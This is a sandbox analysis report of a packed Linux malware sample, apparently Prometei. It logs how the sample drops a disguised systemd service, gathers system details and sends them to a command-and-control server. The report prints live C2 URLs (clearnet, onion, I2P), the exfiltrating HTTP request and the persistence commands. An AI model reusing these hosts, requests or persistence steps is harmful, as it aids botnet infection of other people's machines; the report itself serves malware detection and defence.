Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
zsvc

Overview

General Information

Sample Name:zsvc
Analysis ID:583683
MD5:991fc745e45b15d782d13330e051d001
SHA1:2b55ad9f8bb2d9cd483f382b172b0ac6d8878b39
SHA256:1d1a234975bab10c6409fa5fde405ce3c5e65832c020f8fbd2958e1577065737
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Sample deletes itself
Sample is packed with UPX
Found Tor onion address
Drops files in suspicious directories
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /proc indicative of miner or evasive malware
Sample listens on a socket
Executes the "pgrep" command search for and/or send signals to processes

Classification

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:583683
Start date:05.03.2022
Start time:18:00:09
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 56s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:zsvc
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal64.evad.lin@0/3@5/0
  • VT rate limit hit for: http://p3.feefreepool.net/cgi-bin/prometei.cgi?r=0&i=271872B6X2BPQ1Z2
Command:/tmp/zsvc
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink from /etc/systemd/system/multi-user.target.wants/uplugplay.service to /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu1
  • zsvc (PID: 6808, Parent: 6745, MD5: 991fc745e45b15d782d13330e051d001) Arguments: /tmp/zsvc
    • zsvc New Fork (PID: 6822, Parent: 6808)
    • sh (PID: 6822, Parent: 6808, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "pgrep zsvc"
      • sh New Fork (PID: 6824, Parent: 6822)
      • pgrep (PID: 6824, Parent: 6822, MD5: f3b843351a404d4e8d4ce0ed0775fa9c) Arguments: pgrep zsvc
    • zsvc New Fork (PID: 6842, Parent: 6808)
    • sh (PID: 6842, Parent: 6808, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 6843, Parent: 6842)
      • pgrep (PID: 6843, Parent: 6842, MD5: f3b843351a404d4e8d4ce0ed0775fa9c) Arguments: pgrep uplugplay
    • zsvc New Fork (PID: 6862, Parent: 6808)
    • sh (PID: 6862, Parent: 6808, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "pidof uplugplay"
      • sh New Fork (PID: 6863, Parent: 6862)
      • pidof (PID: 6863, Parent: 6862, MD5: 1927a3fb9f656f7b53b72c92cbbecfe9) Arguments: pidof uplugplay
    • zsvc New Fork (PID: 6882, Parent: 6808)
    • sh (PID: 6882, Parent: 6808, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 6883, Parent: 6882)
      • pgrep (PID: 6883, Parent: 6882, MD5: f3b843351a404d4e8d4ce0ed0775fa9c) Arguments: pgrep upnpsetup
    • zsvc New Fork (PID: 6902, Parent: 6808)
    • sh (PID: 6902, Parent: 6808, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 6903, Parent: 6902)
      • pidof (PID: 6903, Parent: 6902, MD5: 1927a3fb9f656f7b53b72c92cbbecfe9) Arguments: pidof upnpsetup
    • zsvc New Fork (PID: 6923, Parent: 6808)
    • sh (PID: 6923, Parent: 6808, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 6924, Parent: 6923)
      • systemctl (PID: 6924, Parent: 6923, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl daemon-reload
    • zsvc New Fork (PID: 6941, Parent: 6808)
    • sh (PID: 6941, Parent: 6808, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 6942, Parent: 6941)
      • systemctl (PID: 6942, Parent: 6941, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl enable uplugplay.service
    • zsvc New Fork (PID: 6959, Parent: 6808)
    • sh (PID: 6959, Parent: 6808, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 6960, Parent: 6959)
      • systemctl (PID: 6960, Parent: 6959, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 6962, Parent: 1)
  • uplugplay (PID: 6962, Parent: 1, MD5: 991fc745e45b15d782d13330e051d001) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 6988, Parent: 6962)
      • sh (PID: 6989, Parent: 6988, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 6990, Parent: 6989)
        • uplugplay (PID: 6990, Parent: 6989, MD5: 991fc745e45b15d782d13330e051d001) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 7011, Parent: 6990, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /proc/cpuinfo"
            • sh New Fork (PID: 7012, Parent: 7011)
            • cat (PID: 7012, Parent: 7011, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /proc/cpuinfo
          • sh (PID: 7028, Parent: 6990, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 7032, Parent: 7028)
            • dmidecode (PID: 7032, Parent: 7028, MD5: cdb63a6daba7a995ddd1d3d0a5fef8a6) Arguments: dmidecode --type baseboard
          • sh (PID: 7042, Parent: 6990, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/os-release"
            • sh New Fork (PID: 7048, Parent: 7042)
            • cat (PID: 7048, Parent: 7042, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/os-release
          • sh (PID: 7057, Parent: 6990, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c uptime
            • sh New Fork (PID: 7065, Parent: 7057)
            • uptime (PID: 7065, Parent: 7057, MD5: 8796b6264c7fd70904d2192ddb5ebf9a) Arguments: uptime
          • sh (PID: 7082, Parent: 6990, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 7086, Parent: 7082)
            • uname (PID: 7086, Parent: 7082, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: uname -a
  • cleanup
SourceRuleDescriptionAuthorStrings
zsvcSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplaySUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: zsvcVirustotal: Detection: 39%Perma Link
Source: zsvcMetadefender: Detection: 28%Perma Link
Source: zsvcReversingLabs: Detection: 57%
Source: /usr/bin/pgrep (PID: 6824)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6843)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 6990)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 7065)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /bin/cat (PID: 7012)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

Networking

barindex
Source: zsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: zsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmpString found in binary or memory: Mhttp://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=0&i=271872B6X2BPQ1Z2 HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQp1YnVudHUtYW5hbHl6ZXINCg0KMXggSW50ZWwoUikgWGVvbihSKSBTaWx2ZXIgNDIxMCBDUFUgQCAyLjIwR0h6DQoNCkludGVsIENvcnBvcmF0aW9uDQo0NDBCWCBEZXNrdG9wIFJlZmVyZW5jZSBQbGF0Zm9ybQ0KDQoNClVidW50dSAmIDE2LjA0LjQgTFRTIChYZW5pYWwgWGVydXMpIA0KDQovdXNyL3NiaW4vDQogMTk6MDA6NDkgdXAgMTEgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAwLjY4LCAwLjQxLCAwLjI0DQpMaW51eCB1YnVudHUtYW5hbHl6ZXIgNC40LjAtMTE2LWdlbmVyaWMgIzE0MC1VYnVudHUgU01QIE1vbiBGZWIgMTIgMjE6MjM6MDQgVVRDIDIwMTggeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=271872B6X2BPQ1Z2&h=ubuntu-analyzer&enckey=MWeBNERSK13fL5ino/38JcZmxqZkaDYu88S23tMT3P9vU0AyeLBlZKGc4715p+agYHec0aVmH6ZpFasRt35KWPbwFYSI/vyf/KwkgBozVtD5TSC8dhEnrLU+GsGwxzBSMgwanvcI9Yluv0p9nHhu+2lHpIBL/4IZHBholdXGj1g= HTTP/1.0Host: p3.feefreepool.net
Source: /usr/sbin/uplugplay (PID: 6990)Socket: 0.0.0.0::88Jump to behavior
Source: unknownDNS traffic detected: queries for: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=0&i=271872B6X2BPQ1Z2 HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQp1YnVudHUtYW5hbHl6ZXINCg0KMXggSW50ZWwoUikgWGVvbihSKSBTaWx2ZXIgNDIxMCBDUFUgQCAyLjIwR0h6DQoNCkludGVsIENvcnBvcmF0aW9uDQo0NDBCWCBEZXNrdG9wIFJlZmVyZW5jZSBQbGF0Zm9ybQ0KDQoNClVidW50dSAmIDE2LjA0LjQgTFRTIChYZW5pYWwgWGVydXMpIA0KDQovdXNyL3NiaW4vDQogMTk6MDA6NDkgdXAgMTEgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAwLjY4LCAwLjQxLCAwLjI0DQpMaW51eCB1YnVudHUtYW5hbHl6ZXIgNC40LjAtMTE2LWdlbmVyaWMgIzE0MC1VYnVudHUgU01QIE1vbiBGZWIgMTIgMjE6MjM6MDQgVVRDIDIwMTggeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=271872B6X2BPQ1Z2&h=ubuntu-analyzer&enckey=MWeBNERSK13fL5ino/38JcZmxqZkaDYu88S23tMT3P9vU0AyeLBlZKGc4715p+agYHec0aVmH6ZpFasRt35KWPbwFYSI/vyf/KwkgBozVtD5TSC8dhEnrLU+GsGwxzBSMgwanvcI9Yluv0p9nHhu+2lHpIBL/4IZHBholdXGj1g= HTTP/1.0Host: p3.feefreepool.net
Source: zsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: zsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: zsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgi
Source: zsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg
Source: zsvc, uplugplay.6.drString found in binary or memory: http://upx.sf.net
Source: zsvc, 6808.1.000000000051f000.0000000001286000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: LOAD without section mappingsProgram segment: 0x400000
Source: zsvc, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: classification engineClassification label: mal64.evad.lin@0/3@5/0

Data Obfuscation

barindex
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
Source: /tmp/zsvc (PID: 6808)File written: /usr/sbin/uplugplayJump to dropped file
Source: /tmp/zsvc (PID: 6808)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6990)Reads from proc file: /proc/statJump to behavior
Source: /bin/cat (PID: 7012)Reads from proc file: /proc/cpuinfoJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/230/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/230/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/231/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/231/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/232/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/232/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/233/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/233/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/234/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/234/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3512/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3512/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/359/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/359/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1452/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1452/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3632/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3632/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3518/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3518/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/10/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/10/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1339/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1339/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/11/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/11/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/12/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/12/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/13/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/13/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/14/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/14/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/15/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/15/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/16/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/16/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/17/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/17/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/18/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/18/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/19/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/19/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/483/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/483/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3527/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3527/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/2/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/2/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3525/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3525/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1346/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1346/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3524/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3524/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/4/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/4/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3523/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3523/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/5/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/5/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/7/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/7/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/8/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/8/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/9/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/9/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/20/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/20/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/21/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/21/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/22/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/22/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/23/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/23/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/24/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/24/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/25/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/25/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/28/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/28/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/29/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/29/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1363/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1363/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3541/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3541/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1362/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1362/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/496/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/496/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/6808/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/6808/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/6800/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/6800/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/30/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/30/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/31/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/31/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1119/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/1119/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3310/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6883)File opened: /proc/3310/cmdlineJump to behavior
Source: /tmp/zsvc (PID: 6822)Shell command executed: sh -c "pgrep zsvc"Jump to behavior
Source: /tmp/zsvc (PID: 6842)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
Source: /tmp/zsvc (PID: 6862)Shell command executed: sh -c "pidof uplugplay"Jump to behavior
Source: /tmp/zsvc (PID: 6882)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
Source: /tmp/zsvc (PID: 6902)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
Source: /tmp/zsvc (PID: 6923)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/zsvc (PID: 6941)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
Source: /tmp/zsvc (PID: 6959)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6989)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 7011)Shell command executed: sh -c "cat /proc/cpuinfo"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 7028)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 7042)Shell command executed: sh -c "cat /etc/os-release"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 7057)Shell command executed: sh -c uptimeJump to behavior
Source: /usr/sbin/uplugplay (PID: 7082)Shell command executed: sh -c "uname -a"Jump to behavior
Source: /bin/sh (PID: 6924)Systemctl executable: /bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6942)Systemctl executable: /bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
Source: /bin/sh (PID: 6960)Systemctl executable: /bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
Source: /bin/sh (PID: 6824)Pgrep executable: /usr/bin/pgrep -> pgrep zsvcJump to behavior
Source: /bin/sh (PID: 6843)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
Source: /bin/sh (PID: 6883)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
Source: submitted sampleStderr: Created symlink from /etc/systemd/system/multi-user.target.wants/uplugplay.service to /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/zsvc (PID: 6808)File: /tmp/zsvcJump to behavior
Source: /tmp/zsvc (PID: 6808)File: /usr/sbin/uplugplayJump to dropped file
Source: /usr/bin/pgrep (PID: 6824)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6843)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6883)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 6990)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 7065)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /tmp/zsvc (PID: 6808)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pgrep (PID: 6824)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pgrep (PID: 6843)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/pgrep (PID: 6883)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6962)Queries kernel information via 'uname': Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6990)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uptime (PID: 7065)Queries kernel information via 'uname': Jump to behavior
Source: /bin/uname (PID: 7086)Queries kernel information via 'uname': Jump to behavior
Source: /bin/cat (PID: 7012)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scripting
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
Non-Application Layer Protocol
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File and Directory Permissions Modification
LSASS Memory3
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Proxy
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
